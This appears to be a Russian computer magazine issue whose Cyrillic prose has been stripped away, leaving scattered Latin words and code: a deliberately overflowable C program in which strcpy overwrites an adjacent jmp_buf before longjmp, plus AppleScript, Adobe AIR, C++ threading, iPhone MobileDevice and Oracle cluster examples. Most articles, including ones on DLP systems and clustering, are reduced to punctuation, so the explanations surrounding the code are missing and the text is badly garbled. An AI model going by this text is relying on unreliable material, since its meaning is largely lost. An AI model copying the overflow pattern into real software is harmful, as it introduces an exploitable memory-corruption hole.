setjmp
jmp_buf,
EBX, EDI, ESI, EBP, ESP EIP. , ? EIP
CALL ,
ESP. setjmp
EAX .
longjmp.
, EAX , longjmp, ESP .

setjmp/longjmp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <setjmp.h>

struct foo
{
    char buffer[160];
    jmp_buf jb;      /* lies directly after the buffer in memory */
};

int main( int argc, char **argv )
{
    struct foo *f = malloc( sizeof(*f));
    if( argc < 2 || f == NULL )
        return 1;
    if( setjmp(f->jb) )
        return 0;
    /* unbounded copy: input longer than 160 bytes overwrites f->jb */
    strcpy( f->buffer, argv[1] );
    longjmp( f->jb, 1 );
}

strcpy( f->buffer, argv[1] ).


-, . *nix ,
:).

, ? ,
.
, - , !
,
.
.
, ,
.
-
.
,
,
.
! z

HTTP://WWW
links

, ,
,



-
( MSDN
).


, .

blog.
threatexpert.com
alex-ionescu.com.


CODING
seva@vingrad.ru

AppleScript

MAC OS X

AppleScript
, AppleScript,
,
.

, . ,
,
GUI-, , .

shell, Perl, PHP . ( )
Mac OS X.
, Mac OS X . AppleScript.
AppleScript System 7.
HyperCard (
HyperTalk, ), AppleScript
, ,
. AppleScript
:

. ,
Mac OS X AppleScript , Cocoa
AppleScript .


Script Editor.


/Application/AppleScript.
HelloWorld .
display alert "Hello World!" #
say "Hello World" #

, , ,
AppleScript c
say. Apple
:). , . ,
:

display alert "Hello World!" buttons {"Hello", "Bye"}
set answer to button returned of the result
if answer is "Hello" then
...
else
...
end if

- . , :
#
set theFile to (choose file with prompt "Select a file to read:" of type {"TEXT"})
open for access theFile
#
set fileContents to (read theFile)
close access theFile

, iTunes AppleScript

AppleScript
.
, . -
.

AppleScript
:
tell application "Microsoft Word"
quit
end tell

C tell ,
. MS Word . tell end tell . , ,
. , . iTunes, ,
AppleScript:
iTunes
tell application "iTunes"
play the playlist named "My Favorite"
end tell

, AppleScript, ,
( AppName.scriptRerminology ).
Script Editor File Open Dictionary ..., .
,
, . , , :
.
, Mac-: open, print,
close quit.
.

AppleScript

Objective-C/Cocoa, ,
AppleScript.

Script Editor
Cocoa-
NSAppleScript. iChat .
// error dictionary (not declared in the original listing)
NSDictionary *errorDict = nil;
NSAppleScript *iChatGetStatusScript = nil;
iChatGetStatusScript = [[NSAppleScript alloc]
    initWithSource: @"tell application \"iChat\" to get status message"];
NSString *statusString = [[iChatGetStatusScript
    executeAndReturnError:&errorDict] stringValue];

, ,
,
, . ,
.

Cocoa-

ocoa,
AppleScript, ,
AppleScript,
, , , , .
AppleScript, .
.scriptSuite .scriptTerminology .sdef. XML, sdef
.
scriptTermonology Script Editor
.
AppleScript .
scriptSuite- Plist Editor, , :
AppleEventCode ,
AppleScript (
);
Name ,
.
,
sdef-.
sdef-
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dictionary SYSTEM "file://localhost/System/Library/DTDs/sdef.dtd">
<dictionary title="My Application Terminology">
  <!-- -->
  <suite name="My Application Scripting" code="XXXX"
         description="Commands and classes">
    <classes>
      <class name="application" code="capp" description=""
             inherits="NSCoreSuite.NSApplication">
        <cocoa class="NSApplication"/>
        <properties>
          <!-- -->
          <property name="some value" code="sval" type="string"
                    description="A value">
            <cocoa method="value"/>
          </property>
        </properties>
      </class>
    </classes>
  </suite>
</dictionary>

SAFARI.scriptSuite Plist Editor-

sdef - ,
.scriptingSuit-. ,
Cocoa-, AppleScripting.
Cocoa Info.plist Scripting OSAScriptingDefinition sdef:
Info.plist
...
<key>NSAppleScriptEnabled</key>
<true/>
<key>OSAScriptingDefinition</key>
<string>Scripting.sdef</string>

Scripting.sdef :
Scripting.sdef
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dictionary SYSTEM "file://localhost/System/Library/DTDs/sdef.dtd">
<dictionary xmlns:xi="http://www.w3.org/2003/XInclude"
            title="Scripting dictionary">
  <!-- / -->
  <xi:include href="file:///System/Library/ScriptingDefinitions/CocoaStandard.sdef"
              xpointer="xpointer(/dictionary/suite)"/>
  <suite name="Scripting" code="VVVV" description="Test Scripting">
    <class name="application" code="capp" description="">
      <cocoa class="NSApplication"/>
      <!-- readonly application -->
      <property name="myprop" code="Smrp" type="string" access="r"/>
    </class>
  </suite>
</dictionary>

, AppleScript
myprop. ObjC-, .
NSApplication,

.
#import <Cocoa/Cocoa.h>

@interface NSApplication (Scripting)
- (NSString *) myprop;
@end

@implementation NSApplication (Scripting)
- (NSString *) myprop
{
    return @"This is my property";
}
@end

E AppleScript , :
tell application "Scripting"
properties
end tell

, AppleScript Cocoa- .
.
. z

CODING
Spider_NET , vr-online.ru

AIR

Adobe AIR
- -
. ,

web- HTML+CSS+JavaScript.
! Adobe AIR
.
AIR ,
. C++
WinAPI. AIR ,
. , : .

What is Adobe AIR

. Adobe AIR (Adobe Integrated Runtime)


.


HTML/CSS, Ajax, Adobe Flex Adobe Flash.


web-
(RIA Rich Internet Applications) .
Adobe AIR, , . (Windows, MacOS, Linux,
QNX, Android), .
, Windows Mobile/Windows Phone.
, ,

AIR-
, AIR- . ,
. . AIR,
, Titanium
(. ).

,
.
, , Adobe AIR,
. , ,
web-
. . Adobe AIR
, .

( , , drag and drop
).

AIR-

AIR- ( ) Adobe AIR.


, , Adobe AIR. ,
Windows, unix-like
.

AIR

,
Adobe AIR. ? , .
.

AIR, SDK
.
(get.adobe.com/air/).
,
, .
, Adobe (,
Dreamweaver), , , ,
Aptana Studio (aptana.
com). , Eclipse, Aptana Studio Aptana
Eclipse, web- (html,
css, js). Aptana AIR
,
(aptana.com/products/air).

Hello world


Adobe AIR.
, Aptana
Studio. , ,
.
HelloWorld.
, (
General Project). Aptana

Aptana Studio
, .
, , .
?
AIR AIR.
. ,
. ,

.
,
. , ,
. .
Properties Project Natures.
, natures. AIR Nature.
OK.
. .

. ,
. :
, , .
- .

, .
AIR-,
:
1. . ,
.
,
.
. ,
. .
, ? .
, SDK. , ,

AIR. .
2. .
AIR- web- , ( ).
. , CSS, ,
. -


html-,
.
,
Hello, World (
F**ck you, World,
..). C ,
application.xml.
AIR-, -
. : , ,
, . application.xml. ,
.
.
, ?

<?xml version="1.0" encoding="utf-8" ?>
<application xmlns="http://ns.adobe.com/air/
application/1.0">
<id>com.xakep.HelloWorld</id>
<filename>Hello World</filename>
<version>1.0</version>
<title>HelloWorld Application</title>
<initialWindow>
<content>HelloWorld.html</content>
<visible>true</visible>
<height>100</height>
<width>300</width>
<x>100</x>
<y>100</y>
</initialWindow>
</application>

HelloWorld
, JavaScript-, .
:

css/
js/
images/

css-
js

.
: css, images, js.
: application.xml HelloWorld.html. .
.
HelloWorld.html. .
.
html-, swf-.
html-. , HelloWorld.html HelloWorld.html.
HelloWorld.html
<html>
<head>
<title>Hello World from AIR</title></head>
<body>
<center><h1>HELLO, WORLD!</h1></center>
</body>
</html>


, .
XML.
application
, . application xmlns XML.
AIR-.
. . .
?
Adobe AIR, . application
:
id AIR-.
com.
_._. 212 ;
filename air-. ,

( , name).
version :
title ;
initialWindow . swf-, html ( ). :
content ;
visible ;
width ;
height ;
X X;
Y Y;

?
transparent ;
resizable ;
..
.
,
vr-online.ru/content/adobe-air-directives-2003.
,
Adobe AIR . . Aptana Studio
( ).
, , ,
. . ,
Hello World
.

, , .
?
, .
Aptana Studio
SimpleDowload.

: css, js, images. , .
- .
, , . ,
SimpleDownloader.html. ,
.
. HTML-
.

<body>
<center><h1>][ 0.1.1</h1></center><br /><br />
<label class="label"><b> : </b>
<input type="text" id="file_url" value="http://" size="30"></label><br />
<label class="label"><b> :</b>
<input type="text" id="save_path" value="C:\temp\" size="30"></label><br />
<button onclick="downloadIt();">!</button>
</body>

.

CSS
: , Adob Apple , . ,
css-.
css .
style.css :
.label {
float:left;
width:20em;
text-align: left;
clear:left;
margin-right: 20px;
color: #A77FFF;
}
h1 {
color: #008CFF;
}

css SimpleDownloader.html. ( head):


<link href="css/style.css" rel="stylesheet" media="all" />

,
. ,
. CSS , . CSS ,
.
, ,
JavaScript . , ,
- ,
JavaScript
. AIRAliases.js,
Adobe AIR SDK. -:
<script type="text/javascript" src="lib/air/AIRAliases.js"></script>

URLStream,
URLRequest . , ,
.
SDK ( , ) ,
,
URLStream
(. ).



function downloadIt()
{
    var file_url = document.getElementById('file_url').value;
    var save_path = document.getElementById('save_path').value
                    + "\\" + GetFilename(file_url);
    var download_url = new air.URLRequest(file_url);
    var urlStream = new air.URLStream();
    var file = new air.File();
    file.nativePath = save_path;
    var fileStream = new air.FileStream();
    // the event object is passed to the handler explicitly
    urlStream.addEventListener(air.ProgressEvent.PROGRESS,
        function(event){
            writeToFile(event, urlStream, fileStream);
        }, false);
    urlStream.addEventListener(air.Event.COMPLETE,
        function(event){
            saveFile(event, urlStream, fileStream);
        }, false);
    fileStream.open(file, air.FileMode.WRITE);
    urlStream.load(download_url);
}

// Helper not shown in the original listing (assumed implementation):
// returns the part of the URL after the last slash.
function GetFilename(url)
{
    return url.substring(url.lastIndexOf('/') + 1);
}

function writeToFile(e, urlStream, fileStream)
{
    if (urlStream.bytesAvailable > 0)
    {
        var data = new air.ByteArray();
        urlStream.readBytes(data, 0, urlStream.bytesAvailable);
        fileStream.writeBytes(data, 0, data.length);
    }
}

function saveFile(e, urlStream, fileStream)
{
    var data = new air.ByteArray();
    urlStream.readBytes(data, 0, urlStream.bytesAvailable);
    fileStream.writeBytes(data, 0, data.length);
    fileStream.close();
    alert(" !");
}

. writeToFile() saveFile().
,
, . COMPLETE

saveFile().
.
, .
, ,
,
, ,
JS (
AIR ).
.
writeToFile() saveFile().

Adobe AIR .
, .
.
, - (, yahoo),
. , .
! z

AIR


. , Delphi/C++,
,
.
.
,
file_url save_path . ,
URLRequest ( ), URLStream
( ) File ( ).


Adobe AIR ,
. Titanium (- ][
). , Titunium , Adobe
AIR, , , :
Python,
Ruby, PHP JavaScript; ; HTTP; . , Titanium (appcelerator.com/products)
. ( Adobe AIR)
Open Source . ,
, ,
.


web-
/ -. ,
Adobe AIR, ,
. Mozilla Prism
(prism.mozilla.com). ,
Mozilla Corporation FireFox.
Prism
web-. ,
,
, Prism, , .
.
web-
. ?
(, )
Prism.
. web-,
, .
, Prism (
XULRunner) GUI.

CODING
deeonis deeonis@gmail.com

. ,
- .
.
. , C++
, .
,
.
Windows API CreateThread. _beginthread
, CreateThread . .

// Listing 1: a free function as the thread entry point
DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
    //
    //
    return 0;
}

class MyClass
{
public:
    MyClass(void);
    ~MyClass(void);
    void RunThread();
private:
    int m_intVar;
};

void MyClass::RunThread()
{
    HANDLE hThread;
    DWORD idThread;
    hThread = ::CreateThread(NULL, 0, &ThreadFunc, 0, 0, &idThread);
}

// Listing 2: a non-static member function as the entry point
class MyClass
{
public:
    ...
    void RunThread();
private:
    DWORD WINAPI ThreadFunc(LPVOID lpParam);
    int m_intVar;
};

DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
    ...
    return 0;
}

void MyClass::RunThread()
{
    HANDLE hThread;
    DWORD idThread;
    //
    hThread = ::CreateThread(NULL, 0, &ThreadFunc, 0, 0, &idThread);
}

. MyClass,
CreateThread. ThreadFunc . ,
, - .
, . ,
. :


,
, , .
, , ,
ThreadFunc
CreateThread. MyClass
,
, API , , , .

.
, ,
ThreadFunc , MyClass friend.

VS
private MyClass. , ThreadFunc
,
,

.

// Listing 3: a free function declared friend of MyClass
DWORD WINAPI ThreadFunc(LPVOID lpParam);

class MyClass
{
public:
    ...
    void RunThread();
    friend DWORD WINAPI ThreadFunc(LPVOID lpParam);
private:
    int m_intVar;
};

DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
    // private
    MyClass* mc = (MyClass*)lpParam;
    mc->m_intVar = 90;
    cout << _T("Start thread, m_intVar = ") << mc->m_intVar;
    return 0;
}

void MyClass::RunThread()
{
    HANDLE hThread;
    DWORD idThread;
    //
    //
    hThread = ::CreateThread(NULL, 0, &ThreadFunc, this, 0, &idThread);
}

, : ThreadFunc
MyClass, ,
.
, , , .
,
ThreadFunc . ,
, .
, .
,
.
- ThreadFunc , , MyClass, ,
.
,
.

// Listing 4: a static member function as the entry point
class MyClass
{
public:
    ...
    void RunThread();
private:
    static DWORD WINAPI ThreadFunc(LPVOID lpParam);
    int m_intVar;
};

DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
    // private
    MyClass* mc = (MyClass*)lpParam;
    mc->m_intVar = 90;
    cout << _T("Start thread, m_intVar = ") << mc->m_intVar;
    return 0;
}

void MyClass::RunThread()
{
    HANDLE hThread;
    DWORD idThread;
    //
    // the object pointer is passed as lpParam so the static function can reach it
    hThread = ::CreateThread(NULL, 0, &ThreadFunc, this, 0, &idThread);
}

MSDN CreateThread

,
. :
__closure
// Listing 5: C++ Builder __closure (method pointer carrying this)
typedef unsigned long (__stdcall *ThrdFunc)(void *arg);    //
typedef unsigned long (__closure *ClassMethod)(void *arg); //
//
typedef union
{
    ThrdFunc Function;
    ClassMethod Method;
} tThrdAddr;

class MyClass
{
private:
    tThrdAddr Addr;
protected:
    unsigned long ThreadFunc(void *arg)
    {
        ...
    };
public:
    void RunThread()
    {
        DWORD idThread;
        Addr.Method = &ThreadFunc;
        //
        CreateThread(NULL, 0, Addr.Function, this, 0, &idThread);
    };
};

.
MyClass,
. ThreadFunc private ,

.

, , .
, C++ Builder,
.
__closure,
. , . 4- ,

this ,
8- .

,
Builder, .
,
. , ,
, .

-, . , - -
.
. z

CODING
(seva@vingrad.ru)

IPHONE
MAC
OS X
Mac OS X
Apple
, iPhone, iPad
iPod touch Mac OS X,
iTunes.

Mobile Device Framework.

:
iPhone ?. ,
,
, , iTunes Apple. iPhone
iPod ( iPod touch) Mac OS X, .
Apple
, ,
, Apple .
iPhone, .
Wi-Fi ( FlashDrive),
USB (iPhone Folders).
USB Wi-Fi ,
.

. , USB,
: (
jailbreak), .
iPhone folders
(iphonefolders.com). iPhone Folders Windows
Explorer, ,
iPod touch iPhone,
USB, . ,
,
jailbreak , iTunes.
(Touch Drive, Touch
Copy ), , ,
, .
Mac OS X
iPhoneDisk MacFuse,
iPhone.


libmobiledevice iPhone
Mac OS X :
usbmuxd/libiphone,
libmobiledevice
MobileDevice.framework.
Mac OS X
. /System/Library/
PrivateFrameworks/MobileDevice.framework. ,
, . ,
-,
theiphonewiki.com. mobiledevice.h,
MobileDevice.framework
, USB- . MobileDevice.
framework .

iPhone Finder
iPhoneDisk
,

, , , USB Drive,
Cydia. , , ,
,
. Default
: ,
iPhoto ( PTP Picture
Transfer Protocol) iTunes.
, Drive + iTunes, Mac OS X. PTP , Mass Storage,
USB-. iTunes XCode
. Drive Only
USB-. .

iTunes

, Apple
,
iTunes, ,
USB-, ,
. Apple
Linu, . libimobiledevice
(libimobiledevice.org). libimobiledevice , iPhone, iPod touch, iPad Apple TV.
,
jailbreak
.
, , SpringBoard, , .
, USB libusb-1.0. usbmuxd , TCP/IP USB. , USB-
,
, .
libusbmuxd. libiphone
iOS.
, AFC- ( AFC2-) . AFC (Apple File Connection)
, iPhone/iPod touch.
iTunes .


Objective-C/Cocoa. XCode MobileDevice.framework, . : MobileDevice MobileDeviceServer.



, / .

#import <Cocoa/Cocoa.h>
#import "MobileDevice.h"

@interface MobileDevice : NSObject {
@public
    struct am_device * dev;
    struct afc_connection * conn;
}
- (MobileDevice *) initWithDevice: (struct am_device *) device;
- (MobileDevice *) copy;
// AFC
- (BOOL) connect;
// ,
- (NSString *) getValue: (CFStringRef) name;
//
- (BOOL) pathExist: (NSString *) path;
- (BOOL) downloadFile: (NSString *) remote_path toLocation: (NSString *) local_path;
- (BOOL) uploadFile: (NSString *) local_path toLocation: (NSString *) remote_path;
- (BOOL) downloadDirectory: (NSString *) remote_path toLocation: (NSString *) local_path;
- (BOOL) uploadDirectory: (NSString *) local_path toLocation: (NSString *) remote_path;
- (BOOL) removeDirectory: (NSString *) remote_path;
- (BOOL) isDirectory: (NSString *) path;
@end

// ,
// init , defaultServer
//
@interface MobileDeviceServer : NSObject {
@public
    NSMutableArray * MobileDevices;
}
+ (MobileDeviceServer *) delfaultServer;
@end

MobileDeviceServer ,
.

MobileDevice.framework /
,
MobileDevice.

Figure: Amarok, Rhythmbox, libgpod, ifuse, gvfs-afc, libiphone, libusbmuxd, usbmuxd, libusb-1.0, libmobiledevice

@implementation MobileDeviceServer

static MobileDeviceServer * DefaultServer = nil;

static void AmDeviceNotificationCallback(
    struct am_device_notification_callback_info * info)
{
    if (info->msg == ADNCI_MSG_CONNECTED)
    { //
        MobileDevice * device = [[MobileDevice alloc]
            initWithDevice: info->dev];
        [device connect];
        [DefaultServer->MobileDevices addObject: device];
    }
    else if (info->msg == ADNCI_MSG_DISCONNECTED)
    { //
        for (int i = 0;
             i < [DefaultServer->MobileDevices count];
             ++i)
        { //
            if (((MobileDevice *)[DefaultServer->MobileDevices
                    objectAtIndex: i])->dev == info->dev)
            {
                [DefaultServer->MobileDevices removeObjectAtIndex: i];
                break;
            }
        }
    }
}

+ (MobileDeviceServer *) delfaultServer
{
    if (DefaultServer == nil) {
        DefaultServer = [[MobileDeviceServer alloc] init];
        //
        DefaultServer->MobileDevices =
            [[NSMutableArray alloc] init];
        // MobileDevice.framework
        struct am_device_notification * subscription;
        if (AMDeviceNotificationSubscribe(
                &AmDeviceNotificationCallback,
                0,0,0,&subscription) != 0)
        { // :(
            [DefaultServer->MobileDevices release];
            [DefaultServer release];
            DefaultServer = nil;
        }
    }
    return DefaultServer;
}
@end

AFC downloadFile MobileDevice.


, .
- (BOOL) downloadFile: (NSString *) remote_path
           toLocation: (NSString *) local_path
{
    if (conn == nil) return FALSE;
    afc_file_ref file_ref;
    if (AFCFileRefOpen(conn, [remote_path cString],
                       AFC_MODE_READ, 0, &file_ref) != 0)
        return FALSE;
    FILE * local_file = fopen([local_path cString], "w");
    if (local_file == NULL) {
        AFCFileRefClose(conn, file_ref);
        return NO;
    }
    char buffer[10000];
    int len;
    do {
        len = sizeof(buffer);
        if (AFCFileRefRead(conn, file_ref, buffer, &len) != 0)
        {
            fclose(local_file);
            AFCFileRefClose(conn, file_ref);
            return NO;
        }
        fwrite(buffer, len, 1, local_file);
    } while(len == sizeof(buffer));
    fclose(local_file);
    AFCFileRefClose(conn, file_ref);
    return YES;
}

, , Mac OS X
Apple, iPhone folders .
iPod/iPhone Mac OS X , ,
(iTunes, Apple mobile device support ).
. z


SYN/ACK
, InfoWatch


DLP-?



, ,
DLP-.
, ,
, , .
, , , , , ,
.
DLP-
-
. , DLP-
c ,
,
,
.
,
.
DLP-.
,
.
, , ( , ,
)
,
.
(, ) (Digital Fingerprints, Document
DNA, ).
, .


- (,
)
DLP. ,
-, ,
, .

email-. ,
.
,

.
, -?
, , ,
.
,
.
DLP-
.
:
. ,
, : .

.
(, , , , ),

(
, ,
, , ).
( ,

), . , .
,
.
(SMS, -)
, -, .
2008 ,
, , ,
.

,
, ,
,
. , ,

. , , -
, ,
.
( , , ) , .
.
,
. ,
,

, .


. .

( ,
)
,
. 2010
- , ,
,
.

.
, , , .
,
(, ),
, (,
) .


.
, , .

.
,
,
, .


.
.
.

, .
, ,
.
, ,

.
,
. ( ) , .
.
- , + - .
, ,
, , ,
, .


,
.
, ,

, , , , , .
. CAD/CAM,
, , (/) - ,
.
, DLP- .

-
. - Probably SPAM, , .
, (/ ),
, ,
.
92-95% , ,



(
).

, .

.
,
-, :
, .
DLP- ,
.
, DLP , Google.
, ,
.

(
)
70- , .
, .

,
.
, , ,
,
. , (
60%), 70- ,
. , - DLP-
, , ,
, .

,
,
. ,
,
,
.

,

,
.
.
, ( Digital Fingerprint,
Document DNA), , .
,
. ,
(
), .
, . ,
. (, 10 000 ),
, ,
9 900 , ,
.
,
, ,
. ,
,
-.
,

3% () 15% ( ). ,
.

,
-. ( 100%) ,
.

, .
, ()
.
, , , ,
.
.
, /, .
.

,
. (
, ) .

, . , , , ,
DLP- .
. , DLP- 100% , -.


,
-,
, .
, .
.
, MP4- .
,
, :
... ,
, ,
, , call-. ,
, . , ,
,
, . , DLP-
, , .

,
, . ,
, .

.
,
.
- , ,
. , , , , ,
. , , InfoWatch
Morph-OLogic, Websense PreciseID,
Digital Fingerprint, .
,
. , ,
. ,
.
.
,
DLP-. , , ,
( , , ),
,
.
.
,
, DRM-, Oracle IRM
Microsoft RMS.
DLP-
,
, .

. z


SYN/ACK
, IT-Academy & Softline it-university.ru


Microsoft Oracle
, , ,
.
, , .
, Microsoft Oracle.

(
),
.
. :

(high-availability clusters failover clusters)
.
(load-balancing clusters)
,
.
(compute clusters), , , , .
(HPC high performance computing clusters),
82% Top500.
(gird)
,
. -
,
. - HPC-, .
.
active/active, ,
active/passive.


Oracle RAC Network Load Balancing active/


active . Failover Cluster Windows Server
active/passive . active/active , . ,
, Ethernet, InfiniBand.
,
, Oracle RAC 15 .
Fibre Channel, iSCSI
NFS .

( Windows Server 2008 R2) ,
(OracleDatabase 11g), .

Windows Clustering

Microsoft
. Windows Server 2008 R2 : Network Load Balancing (NLB) Cluster Failover Cluster. Windows Server 2008 HPC Edition .
HPC-,
, web- .
NLB- TCP/IP .
, IIS, VPN . ,

,
, . NLB-
x64-, x86.
Failoverclustering ,
.

LAN- WAN-, multi-site Windows Server 2008
500 , heartbeat.

. Enterprise edition ,
, .
(cluster-unaware)
.
(cluster-aware),
ClusterAPI,
.

failover-

.
, The Microsoft Support Policy
for Windows Server 2008 Failover Clusters. .
, FibreChannel, iSCSI Serial Attached SCSI. ,
Windows Server 2008, persistent
reservations.


Failover Clustering , Server Manager.
,
.
. , ,
member server, domain controller
DNS Exchange.
, . Failover
Cluster Management.
, (. 1).
. Failover Cluster
Management Create Cluster, , ,
IP-. ,
(,
), Failover Cluster Management
Do not allow the cluster to use this network.
,
. High Availability Wizard,
Services and Applications Failover
Cluster Management (. 2).

Cluster Shared Volumes

failover- LUN, ,
,


. 1. failover-
(. 3). LUN .
,
.
, - , LUN , ,
, LUN,
, LUN, .
( Hyper-V Server 2008)
LUN,
. Server
2008 R2 ,
Hyper-V CSV (Cluster Shared Volumes). CSV
,
(
) .
CSV NTFS.
CSV Failover Cluster Manage Enable
Cluster Shared Volumes. CSV
:
Get-Cluster | %{$_.EnableSharedVolumes = "Disabled"}
Failover
Clusters, PowerShell. CSV live
migration ,
. , (,
) , CSV, -. , -


, -. ,
(,
), -.

Oracle RAC

Oracle Real Application Clusters (RAC)


Oracle Database, Oracle Database 9i
OPS (Oracle Parallel Server).

. Oracle Database -


High Availability Microsoft: microsoft.com/
windowsserver2008/en/us/high-availability.aspx;

Failover Clustering NLB: blogs.msdn.com/b/clustering/
archive/2009/08/21/9878286.aspx ( Clusteringand HighAvailability );
Oracle RAC: oracle.com/
technetwork/database/clustering/overview/index.html;
Oracle Clusterware Oracle
Grid Infrastructure: oracle.com/technetwork/database/
clusterware/overview/index.html;
Oracle Clusterware Single Instance
Oracle Database 11g: oracle.com/technetwork/database/si-dbfailover-11g-134623.pdf.


. 2. High availability wizard


, ,
. ,
,
. (instance)
(SGA) .
RAC
.
RAC Enterprise Edition
. , RAC Standard
Edition, Enterprise Edition,
.

Oracle Grid Infrastructure

Oracle RAC Oracle Clusterware (


) .
( 11g R2
, , ). 11g Oracle Clusterware ASM Oracle Grid Infrastructure,
.
Automatic Storage Management (ASM)
, , singleinstance . ASM ASM Allocation Unit.
Allocation Unit AU_SIZE,
1, 2, 4, 8, 16, 32
64 MB. Allocation Units ASM-
(. 4).
, ASM, .
ASM- Failure Group (

, ,
, ), , Failure
Group. ASM
, . ASM ,
Oracle, ,
RMAN.
, ASM.
ASM-. Oracle ASM
, RAW-.

. 3. Failover_cluster


, Oracle
, Oracle.
Oracle
,
.
Installation Guide, .
,
Oracle
Clusterware. votingdisk (, ) Oracle Cluster Registry (
,
).
votingdisk. ASM ASMLib,
:
# rpm -Uvh oracleasm-support-2.1.3-1.el4.x86_64.rpm
# rpm -Uvh oracleasmlib-2.0.4-1.el4.x86_64.rpm
# rpm -Uvh oracleasm-2.6.9-55.0.12.ELsmp-2.0.3-1.x86_64.rpm

. 4. ASM disk group

Oracle RAC

,
Oracle RAC active/active
(. 7).
Oracle Database
11g Release 2. Oracle
Enterprise Linux 5. Oracle Enterprise Linux ,
RedHat Enterprise Linux.


Interconnect, External Backup.
IP- ( Oracl e GNS) DNS (
GNS).
Grid Infrastructure.
,
(. 5).
; , ;
; .
root orainstRoot.sh
root.sh. orainstRoot.sh,

.
orainstRoot.sh root.
sh. :
/u01/grid/bin/crsctl check cluster all
, .
Oracle Universal installer (. 6),
.

. 5. OracleGrid Infrastructure


. 6. Oracle 11g R2 universal installer


active/active- 11g R2
active/passive-.
Oracle RACOneNode.
RAC Oracle Clusterware.
; Grid
Infrastructure, ASM_CRS SCAN;
Standalone. ,
.

Oracle RAC Oracle Grid Infrastructure


.

.
Microsoft , ,
. ,
, . z

. 7. Oracle RAC c


SYN/ACK
.., . InfoWatch




( ) ,
.

, ( ) , .
( )
, .
.
, , ,
.
(
), , , .
, .
XVI ,
XIX,
XX .
, ( , ) . , .
:
.
, -
, ,
.
,
,
.
, ,
,
.
.
. :

,
.



.
.
, ,
, ,
, , .

. ,
.
.
,
,
.
(, , ) ,
.
, .
, .
,
.

.
.
,
.
,
. ,
: .



(), DRM (Digital Rights
Management []
).

. ,
CD, , ,
save as . . , :
, .
, ,
: , ,
,
, , (. 1299 ).

, , ( 4 2010 ,
).

, .
, . ,
(.
).


. .
( ) .

c Sony BMG
: , ,
.
.

,
, , .
. (. 273 ) ,
,
-
. .
DRM- XCP
Sony BMG . ,
-,
, (-, ),
.
, .
, , .
,
, 28 (. 272-274).

, , .
, ,
( ),

.
. . ,

. , ,
dbf- . ,
,
. , DBF, , -
,
.
, .
, , : !
. ,
.
, -
,
. .
: ,
!. - , , ,
, . -
,
. .
, ,


(. 273 ):
,
, , ,
, .
:
,
, ,
(,
), (
) .

PGPdisk.
.
,
. , .
.

,
.
.
.

. ,
, ,
. . , , ,
.
.
.
, . ,
,
.

. ,
, . ,
, :
, , , , . . , ,
.
, ,
.
, (
) , . ,
, . ,
. . .
, , , , - . ,
,
.
, .

. ,
.
. .
,
.

.
, , ,
. -,
. , ,
.
. .
, 273-
,
. ,
.
,
, : , , .
, .
, .
, , . z

.
. , , .
, . .
.

,
, ,

,
,

, ,


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:



:
, , ,
.

,
,
, ,
, ,
,
.

()
, .
,
. , -,
( , ), -
( ).
()
. ,

: , , (
,

);
,
.
:
(, ),
(, ),
, (),
, ,


,
.
, , ,
,
,
;
:
- ,
;
-
, ,

, , .
:
, .

,
99
, , PR
.


.
, , , ,
.
, ,

:
.
,
: ,
,
.


:
, , ,
.
,
:
, ,
,
(
,
, ).
,
: ,
, ,
-
,
,
. , ,
, ,
.


( ,
).


(
)


.
( ) , , . ,

,
,
( ).

,
, ,
,
, .
,
,
,
, , ,
, , .
,
(
)
,
.

.


,
, , .
:
( )
, (
),
.
( ,
) , ,
, ,


.
: ,

.

- :
, ; ,
. ,
. ,
, -



, , , 1
.

,
. ,

,
, ,
.

-

,
.
1 ?

()

,
. - ? (
),
.
,

INFO

info







.

WARNING
warning

, ( + )
( ,

)
.

,
,
, , ,
, .

, ,
.

-
(-,
!).

,
.
,
, .


( , ) (,
-, ),


,

. ,

,

,

.



,
.


,
,
,
. , ,
,

, .

:
, ,
, (
, ),
,
. , (

) ,
(
) , .
, ,
( ,

, ),

.


,
. , , , , .
:


. Epic fail

, ,
,
. : (, ) ,
, ,
(,
) , .
, , .


, -,
,
. , ,
,
,
( )
.

!, !,
. ,

,
(: , ) ,
.
,

,
. , :
,
, ,
,
.
-


(, , )

: ,
(, ), ,
. , ,
.

),
, .
,

.

,
, .

, :
. ,
.

:
, . ,

. ,
.

,

, (),
.

:
- , ,

.
, - , .
, :

.

,
,
.
. ,

.
, ,
. -

,
,
.


,
,
SHODAN.
,

, . .
, ,
, :
, ,
.




( -

,
.



:
( ),
(,
). .
: ,
400 , 290,
, ,
200.
-
, ,
, ,
.

:
, .
,
: , , ,
.
, .
,
,
, , ,
,
-
.
,
0
!*,

, *
1500 ./
.
,
,

. , , ,


, , 100%. , , 98:
100 ,
,
, , , ,
.

.

, .
, :
,
( , )
,
( , ),
.
3/8 ( )
.

( ),
, ,
,
. ,
:
,
: ,
, .
, , , :

30 !.
( -

, ),
.
,
,

, , .
,
, -
, :
100%- , ?

. , ,

,
,
, 20-
, .

(,
), .

, .
( ) :
( ),
- , , , Sobranje.
. VIP, Business
Optima. .


,
.

,
,
. .

, , , .
,
- ,
,
(-, :
,
).
.
! :) z


UNITS
Step twitter.com/stepah

faq
united?
faq@real.xakep.ru

Q:
WinAPI-.
,

, . ( C++),
.
?
A: WinAPI
.
WebMoney,
WM Keeper
,
. (
,
)
(bit.ly/winapi_hack_
webmoney). .
,
++
. winapiexec (rammichael.com/winapiexec), . :
winapiexec.exe library.dll@FunctionName 123 unicode_text "a space"

, . ,


, winapiexec.
.
1. :
winapiexec.exe CreateProcessW 0 calc 0 0 0 0x20 0 0 $a:0x44,,,,,,,,,,,,,,,, $b:16 , Sleep 1000 , TerminateProcess $$:11@0 0
2. -:
winapiexec.exe u@SendMessageW ( u@FindWindowW Shell_TrayWnd 0 ) 0x111 420 0
3. MessageBox temp:
winapiexec.exe GetTempPathW 260 $b:520 , u@MessageBoxW 0 $$:3 $$:0 0x40
,
WinAPI-,
: codeproject.com/KB/miscctrl/Taskbar_
Manipulation.aspx.

Q: , ,
.
FB2 ( ), ePub . ?
A: , .
FB2, ePub , ,
. ,
.
fb2epub.com FB2 ePub . ,
, -

.
, Kindle Amazon
(- $139, ,
Wi-Fi ).

: MOBI
-. Kindle
